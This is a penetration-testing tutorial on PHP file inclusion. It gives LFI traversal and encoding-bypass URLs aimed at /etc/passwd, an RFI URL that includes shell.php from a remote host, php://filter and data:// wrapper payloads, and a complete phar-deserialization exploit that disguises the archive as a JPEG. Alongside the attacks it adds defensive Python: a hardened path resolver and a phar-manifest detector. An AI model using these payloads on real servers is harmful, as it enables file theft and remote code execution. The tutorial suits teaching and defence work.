# File Inclusion

## File inclusion

A vulnerability in which user-controlled input reaches a function that loads (and, for `include`/`require`, executes) a file. In PHP the sinks are `include`, `require`, their `_once` variants and file-reading functions such as `file_get_contents()`. Depending on the server configuration an attacker can read arbitrary local files, leak application source code or execute code of their own.

## Local File Inclusion (LFI)

The server loads a file from its own filesystem that the attacker chooses, usually by traversing out of the intended directory with `../`.

### Basic LFI and bypasses

```
http://domain.com/index.php?page=../../../etc/passwd
```

#### URL encoding

One can try URL-encoding the path once or several times. Double encoding (`%252f` decodes to `%2f`, which decodes to `/`) defeats a filter that decodes the parameter once before inspecting it, while something downstream decodes it again. `%c0%af` is an overlong UTF-8 encoding of `/` that older decoders accepted. A trailing `%00` (null byte) truncates whatever the application appends to the path (such as `.php`) and only works on PHP versions before 5.3.4.

```
# Double URL-encoded slashes
http://domain.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
# Overlong UTF-8 encoding of "/"
http://domain.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
# Double-encoded dots and slash
http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd
# Null byte to cut off an appended extension (PHP < 5.3.4 only)
http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```

#### Filter bypasses

```
# Survives a non-recursive strip of "../": removing the inner "../" leaves "../"
http://domain.com/index.php?page=....//....//etc/passwd
# Extra slashes are collapsed by the filesystem but can confuse pattern-based filters
http://domain.com/index.php?page=..///////..////..//////etc/passwd
# Case variation to get past a case-sensitive blocklist of "php://"
http://domain.com/index.php?page=PhP://filter
```
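Why several of the bypasses above work is easiest to see against a concrete weak filter. The following Python is an added example, not code from this page or from HackTricks: it models a filter that URL-decodes once, blocks the literal `php://` prefix case-sensitively and strips `../` with a single non-recursive replace, models an application that decodes the parameter a second time before resolving it under a hypothetical web root `/var/www/html` (both are assumptions), and shows which of the page's payloads still reach a file outside the root or a wrapper. The `PhP://filter` payload is completed with a `convert.base64-encode` resource so it is a full URL. A hardened resolver that decodes exactly once, rejects schemes and null bytes and checks containment is shown beside it.

```python
import posixpath
import re
from typing import Callable, Dict, Optional
from urllib.parse import unquote

# Hypothetical web root of the vulnerable application (assumption, not from the page).
WEB_ROOT = "/var/www/html"

# Anything that looks like a stream wrapper or URL scheme, e.g. php://, data://, http://
SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def naive_sanitize(page: str) -> str:
    """Weak filter of the kind the bypasses above defeat: one round of URL
    decoding, a case-sensitive block on 'php://' and a single non-recursive
    str.replace() of '../'."""
    decoded = unquote(page)
    if decoded.startswith("php://"):
        raise ValueError("wrapper blocked")
    return decoded.replace("../", "")


def vulnerable_resolve(page: str) -> str:
    """What reaches include() in the modelled vulnerable app. The app is assumed
    to call urldecode() on the parameter again after the filter ran; that second
    decode is what makes the double-encoded payload work."""
    path = unquote(naive_sanitize(page))
    if SCHEME.match(path):
        return path                      # a wrapper URL goes straight to include()
    return posixpath.normpath(WEB_ROOT + "/" + path)


def escapes_root(resolved: str) -> bool:
    """True when the resolved target is a wrapper URL or lies outside WEB_ROOT."""
    if SCHEME.match(resolved):
        return True
    return posixpath.commonpath([WEB_ROOT, resolved]) != WEB_ROOT


def hardened_resolve(page: str) -> Optional[str]:
    """Hardened form: decode exactly once, reject null bytes and any scheme,
    normalise, and require the result to stay below WEB_ROOT. On a real server
    use os.path.realpath() so symlinks are resolved as well."""
    decoded = unquote(page)
    if "\x00" in decoded or "://" in decoded:
        return None
    full = posixpath.normpath(WEB_ROOT + "/" + decoded)
    if posixpath.commonpath([WEB_ROOT, full]) != WEB_ROOT:
        return None
    return full


# Payloads from this page; the comment names the weakness each one relies on.
PAYLOADS = {
    "plain":          "../../../etc/passwd",                  # caught by the '../' strip
    "double_encoded": "..%252f..%252f..%252fetc%252fpasswd",  # survives a single decode
    "nested_dots":    "....//....//....//etc/passwd",         # stripping '../' leaves '../'
    "case_wrapper":   "PhP://filter/convert.base64-encode/resource=index.php",  # case-sensitive block
}


def survivors(resolver: Callable[[str], Optional[str]]) -> Dict[str, str]:
    """Map payload name -> resolved target for every payload that escapes WEB_ROOT."""
    out = {}
    for name, raw in PAYLOADS.items():
        try:
            resolved = resolver(raw)
        except ValueError:
            continue
        if resolved is not None and escapes_root(resolved):
            out[name] = resolved
    return out


if __name__ == "__main__":
    for name, target in survivors(vulnerable_resolve).items():
        print(f"{name:15} -> {target}")
    print("hardened survivors:", survivors(hardened_resolve))
```

Against the weak filter the plain payload is the only one that is stopped; the double-encoded, nested-dots and mixed-case wrapper payloads all get through, and none of them survive the hardened resolver. The `..///` payload from the page is not modelled because it targets pattern-based filters rather than this particular one.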

## Remote File Inclusion (RFI)

The server loads a file hosted on another server, so the attacker's own PHP code is executed.\
In PHP, RFI over `http://` or `ftp://` only works if `allow_url_include` is `On` (it is `Off` by default, and it additionally requires `allow_url_fopen`).

### Basic RFI and bypasses

```
# Needs allow_url_include=On
http://domain.com/index.php?page=http://remote.com/shell.php
# UNC path (Windows targets): treated as a file path by the OS, so allow_url_include does not apply
http://domain.com/index.php?page=\\remote.com\shell.php
```

## PHP wrappers

### php://filter

The `php://filter` wrapper applies stream filters to a file as it is read, so its contents are transformed before `include` sees them.\
Base64-encoding a PHP file this way returns its source instead of executing it, which turns an LFI into source-code disclosure; case variations of the scheme (see above) can also slip past naive blocklists.

```
# Leak a file base64-encoded (decode the response with `base64 -d`)
http://domain.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://domain.com/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
```

### data://

The `data://` wrapper supplies the included content inline, which gives direct code execution. Like RFI it requires `allow_url_include=On`. In a real request the payload must be URL-encoded, otherwise characters such as `+` and `&` are consumed by the query-string parser; the `data://text/plain;base64,...` form avoids most of that.

```
http://domain.com/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://domain.com/?page=data://text/plain,<?php phpinfo(); ?>
```

### phar:// and phar deserialisation

A `.phar` file is a PHP archive. Its manifest carries metadata in PHP's serialised format, and when the archive is opened through the `phar://` wrapper that metadata is deserialised.\
An uploaded phar whose metadata holds an object of a class that exists on the server therefore triggers that class's magic methods (`__wakeup`, `__destruct`) with attacker-chosen property values.

The application does not have to call `unserialize()` itself: any file-system function handed an attacker-controlled `phar://` path triggers the deserialisation, including `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()` and `filesize()`. Since PHP 8.0 the metadata is no longer unserialised automatically on such operations (only when `Phar::getMetadata()` is called), so this technique targets PHP 7.x and earlier.

* [More detail](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization)

#### Exploitation

1. Pretend that this is the source code of the server. The class is never instantiated by the application itself; it only needs to exist so the deserialised metadata can resolve to it, and `__destruct` runs when the deserialised object is garbage-collected.

   ```php
   <?php
   // server.php
   class ReadFile {
   	public $data = null;

   	public function __construct($data) {
   		$this->data = $data;
   	}

   	// Gadget: runs with attacker-controlled $data once the object is destroyed
   	function __destruct() {
   		system($this->data);
   	}
   }

   // In the real application the path would be user input (e.g. $_GET['page'])
   // reaching any of the file-system functions listed above.
   file_get_contents("phar://pwned.phar");

   ?>
   ```
2. This is the code that will make the phar file. The class definition must match the one on the server so that the serialised metadata names the right class and property.

   ```php
   <?php
   // make_phar.php
   class ReadFile {
   	public $data = null;

   	public function __construct($data) {
   		$this->data = $data;
   	}

   	function __destruct() {
   		system($this->data);
   	}
   }

   // Make phar (requires phar.readonly=0, see step 3)
   $phar = new Phar('pwned.phar');
   $phar->startBuffering();
   $phar->addFromString('test.txt', 'text');
   // The stub must end with __HALT_COMPILER(); anything before it is ignored by PHP
   $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

   // Add object of class as metadata; it is serialised into the manifest
   $object = new ReadFile('whoami');
   $phar->setMetadata($object);
   $phar->stopBuffering();
   ?>
   ```

*Magic bytes of JPG* `\xff\xd8\xff` *have been added in front of the stub so the file passes a magic-byte check on upload while PHP still finds* `__HALT_COMPILER();`*. The file can also be uploaded under any extension (e.g.* `.jpg`*): the* `phar://` *wrapper does not care about the name.*

3. Generate `pwned.phar` with the following command; `phar.readonly` is `On` by default and must be disabled for the script to write the archive:

   ```bash
   php --define phar.readonly=0 make_phar.php
   ```
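The same manifest structure that makes this attack possible is what an upload handler or forensic triage script can inspect. The following Python is an added example, not code from this page or from HackTricks: it locates the phar manifest behind `__HALT_COMPILER();`, reads the global metadata according to the phar manifest layout, and reports the class names of any serialised objects found there, which is exactly the signal that a file claiming to be a JPEG is really a phar gadget. The sample archive is constructed inline (the signature trailer is omitted since the parser never reads it), and the metadata is the serialised form of the page's `ReadFile('whoami')` object.

```python
import re
import struct
from typing import List, Optional

HALT = b"__HALT_COMPILER();"


def phar_metadata(blob: bytes) -> Optional[bytes]:
    """Return the serialised global metadata of a phar archive, b'' if the archive
    has none, or None if the blob is not a phar at all. Layout after the stub
    (all integers little-endian): u32 manifest length, u32 file count,
    u16 API version, u32 global flags, u32 alias length, alias,
    u32 metadata length, metadata, then the per-file entries."""
    pos = blob.find(HALT)
    if pos < 0:
        return None
    pos += len(HALT)
    # PHP tolerates an optional ' ?>' and a single newline after the halt token.
    if blob.startswith(b" ?>", pos):
        pos += 3
    for nl in (b"\r\n", b"\n"):
        if blob.startswith(nl, pos):
            pos += len(nl)
            break
    if len(blob) < pos + 18:
        return None
    _manifest_len, _file_count, _api, _flags, alias_len = struct.unpack_from("<IIHII", blob, pos)
    pos += 18 + alias_len
    if len(blob) < pos + 4:
        return None
    (meta_len,) = struct.unpack_from("<I", blob, pos)
    pos += 4
    return blob[pos:pos + meta_len]


# PHP serialised object header: O:<name length>:"<class name>"
OBJECT = re.compile(rb'O:(\d+):"([^"]+)"')


def serialised_classes(meta: bytes) -> List[str]:
    """Class names of every object embedded in a PHP serialised string."""
    return [name.decode() for _, name in OBJECT.findall(meta)]


def phar_gadget_classes(blob: bytes) -> List[str]:
    """Classes whose __wakeup/__destruct would run if this file were opened via phar://."""
    meta = phar_metadata(blob)
    return serialised_classes(meta) if meta else []


def build_sample_phar(meta: bytes, stub: bytes) -> bytes:
    """Construct a minimal, unsigned phar so the parser can be exercised offline."""
    filename, content = b"test.txt", b"text"
    entry = (struct.pack("<I", len(filename)) + filename
             + struct.pack("<IIII", len(content), 0, len(content), 0)  # uncompressed size, mtime, compressed size, crc32
             + struct.pack("<II", 0x1A4, 0))                           # entry flags (0644), no per-file metadata
    body = (struct.pack("<IHI", 1, 0x1100, 0)      # one file, API 1.1.0, no global flags
            + struct.pack("<I", 0)                 # empty alias
            + struct.pack("<I", len(meta)) + meta  # global metadata: the gadget object
            + entry)
    return stub + struct.pack("<I", len(body)) + body + content


# Constructed sample: the stub from make_phar.php above plus the serialised ReadFile object.
SAMPLE_META = b'O:8:"ReadFile":1:{s:4:"data";s:6:"whoami";}'
SAMPLE_PHAR = build_sample_phar(SAMPLE_META, b"\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>\r\n")
# Constructed sample of a genuine JPEG header for comparison.
REAL_JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"

if __name__ == "__main__":
    for label, blob in (("pwned.phar", SAMPLE_PHAR), ("real.jpg", REAL_JPEG_HEADER)):
        print(f"{label}: gadget classes = {phar_gadget_classes(blob)}")
```

Both files start with the JPEG magic bytes, so a magic-byte check accepts both; only the manifest walk tells them apart. A defensive upload handler would reject any file in which `__HALT_COMPILER();` is followed by a parseable manifest, regardless of the declared extension.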

## References

* <https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization>

